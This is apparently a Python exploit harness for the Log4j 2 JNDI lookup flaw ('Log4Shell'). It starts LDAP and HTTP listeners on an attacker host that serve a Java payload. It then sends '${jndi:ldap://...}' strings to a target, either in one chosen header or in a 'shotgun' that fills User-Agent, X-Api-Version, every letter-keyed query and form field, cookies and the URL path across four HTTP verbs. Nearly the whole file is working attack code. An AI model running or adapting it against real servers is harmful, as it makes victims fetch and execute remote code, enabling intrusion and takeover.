import multiprocessing
import requests
import string
from handlers import LDAB, HTTB
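class Attack:
    """Base harness holding the target and listener settings plus two helper processes.

    The class stores where the request is sent (``target_url``), the address
    and ports passed to ``handlers.LDAB`` / ``handlers.HTTB`` (``lhost``,
    ``ldap_port``, ``http_port``), and the opaque ``java_payload`` handed to
    both handlers. Subclasses implement ``trigger_vulnerability``.

    What LDAB and HTTB do is not visible in this file; from the status
    messages they presumably run an LDAP and an HTTP listener bound to
    ``lhost`` -- confirm in ``handlers``.
    """

    def __init__(self, target_url, lhost, java_payload, ldap_port="42063", http_port="42080"):
        self.target_url = target_url
        self.lhost = lhost
        # Ports default to strings; the subclasses in this file splice
        # ldap_port into the lookup string with str.replace, which needs str.
        self.ldap_port = ldap_port
        self.http_port = http_port
        # Path component appended after host:port in the lookup string and
        # also passed to LDAB.
        self.query_name = "/LegitimateJavaClass"
        self.java_payload = java_payload
        # Handles are created by server_processes(); None means "not started",
        # so cleanup can be called safely at any point.
        self.ldap_process = None
        self.http_process = None

    def ldap_runner(self):
        """Print a status line, then call ``LDAB`` with the stored settings."""
        print("starting ldap on {}".format(self.ldap_port))
        LDAB(self.lhost, self.ldap_port, self.query_name, self.http_port, self.java_payload)

    def http_runner(self):
        """Print a status line, then call ``HTTB`` with the stored settings."""
        print("starting http on {}".format(self.http_port))
        HTTB(self.lhost, self.http_port, self.java_payload)

    def server_processes(self):
        """Start ``ldap_runner`` and ``http_runner``, each in its own process.

        The ``multiprocessing.Process`` handles are kept on the instance so
        ``kill_server_processes`` can stop them.
        """
        self.ldap_process = multiprocessing.Process(target=self.ldap_runner)
        self.ldap_process.start()
        self.http_process = multiprocessing.Process(target=self.http_runner)
        self.http_process.start()

    def kill_server_processes(self):
        """Kill both helper processes and wait for them to exit.

        A handle that was never created is skipped, so calling this before
        ``server_processes`` no longer raises ``AttributeError``. Each killed
        process is joined so that no unreaped child (and no listener it owns)
        is left behind.
        """
        print("exiting")
        for proc in (self.ldap_process, self.http_process):
            if proc is None:
                continue
            proc.kill()
            proc.join()

    def trigger_vulnerability(self):
        """Send the request(s) carrying the lookup string; subclasses override.

        Note that ``AttackWithHTTPHeader`` overrides this with an extra
        ``header_name`` parameter, so the two signatures differ.
        """
        raise NotImplementedError()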
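class AttackWithHTTPHeader(Attack):
    """Variant that places the JNDI lookup string in one caller-chosen request header."""

    def trigger_vulnerability(self, header_name):
        """Send a single GET to ``target_url`` with the lookup string in ``header_name``.

        The value has the form ``${jndi:ldap://<lhost>:<ldap_port><query_name>}``,
        which is the Log4j 2 lookup syntax. It is sent verbatim, so request
        logs and filters keyed on the literal ``${jndi:`` prefix will record it.
        The response is discarded.
        """
        lookup = (
            "${jndi:ldap://{LHOST}:{LPORT}{query_name}}"
            .replace("{LHOST}", self.lhost)
            .replace("{LPORT}", self.ldap_port)
            .replace("{query_name}", self.query_name)
        )
        # NOTE(review): no timeout is passed, and requests has no default
        # timeout, so an unresponsive target blocks here indefinitely.
        requests.get(self.target_url, headers={header_name: lookup})

    def attack(self, header_name):
        """Start the helper processes, send the request, then stop the helpers.

        The request runs inside ``try``/``finally`` so the helper processes
        are stopped even when the request raises (connection refused, DNS
        failure, ...); otherwise the listeners would stay up after the run.
        """
        print("attacking")
        self.server_processes()
        try:
            self.trigger_vulnerability(header_name)
        finally:
            self.kill_server_processes()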
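class HTTPShotgun(Attack):
    """Variant that places the JNDI lookup string in many request fields at once."""

    def trigger_vulnerability(self):
        """Send eight requests with the lookup string in headers, query, cookie, body and path.

        The same ``${jndi:ldap://<lhost>:<ldap_port><query_name>}`` string
        (Log4j 2 lookup syntax) is used as:

        * the value of the ``User-Agent`` and ``X-Api-Version`` headers,
        * the value of one query parameter per ASCII letter, plus one
          parameter whose name is the string itself,
        * the name and value of a cookie,
        * the same letter-keyed mapping again as form data,
        * a path segment appended to ``target_url``.

        GET, POST, PUT and DELETE are each sent to the path-suffixed URL and
        then to the bare ``target_url``. Every request carries the literal
        string in several fields, so the run is conspicuous in access logs
        and matches filters keyed on the ``${jndi:`` prefix. Responses are
        discarded.
        """
        jndi = (
            "${jndi:ldap://{LHOST}:{LPORT}{query_name}}"
            .replace("{LHOST}", self.lhost)
            .replace("{LPORT}", self.ldap_port)
            .replace("{query_name}", self.query_name)
        )
        header_names = ["User-Agent", "X-Api-Version"]
        headers = {name: jndi for name in header_names}

        params = {name: jndi for name in string.ascii_letters}
        params[jndi] = jndi
        cookies = {jndi: jndi}
        path = self.target_url + "/" + jndi
        data = {name: jndi for name in string.ascii_letters}
        data[jndi] = jndi

        # Same order as the original eight calls: for each verb, the
        # path-suffixed URL first, then the bare target URL.
        # NOTE(review): no timeout is passed, and requests has no default
        # timeout, so an unresponsive target blocks on the first request.
        for send in (requests.get, requests.post, requests.put, requests.delete):
            for url in (path, self.target_url):
                send(url=url, data=data, headers=headers, cookies=cookies, params=params)

    def attack(self):
        """Start the helper processes, send the requests, then stop the helpers.

        The requests run inside ``try``/``finally`` so the helper processes
        are stopped even when one of the eight requests raises; otherwise the
        listeners would stay up after the run.
        """
        print("attacking")
        self.server_processes()
        try:
            self.trigger_vulnerability()
        finally:
            self.kill_server_processes()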